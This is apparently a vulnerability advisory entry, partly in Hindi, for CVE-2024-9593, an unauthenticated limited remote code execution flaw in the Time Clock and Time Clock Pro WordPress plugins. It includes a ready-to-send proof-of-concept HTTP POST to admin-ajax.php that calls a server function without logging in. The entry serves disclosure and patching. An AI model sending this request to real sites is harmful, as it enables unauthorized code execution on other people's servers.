
Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - अप्रमाणित (सीमित) रिमोट कोड निष्पादन
Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - बिना प्रमाणीकरण के (सीमित) रिमोट कोड निष्पादन
Time Clock प्लगइन और Time Clock Pro प्लगइन WordPress के लिए, संस्करण 1.2.2 (Time Clock के लिए) और 1.1.4 (Time Clock Pro के लिए) तक, 'etimeclockwp_load_function_callback' फ़ंक्शन के माध्यम से रिमोट कोड निष्पादन के लिए असुरक्षित हैं। यह बिना प्रमाणीकरण के हमलावरों को सर्वर पर कोड निष्पादित करने की अनुमति देता है। लागू किए गए फ़ंक्शन के पैरामीटर निर्दिष्ट नहीं किए जा सकते।
Published: 2024-10-18 00:00:00
CVE: CVE-2024-9593
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
CVSS Score: 8.3
Slugs: time-clock-pro, time-clock
POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
function=phpinfo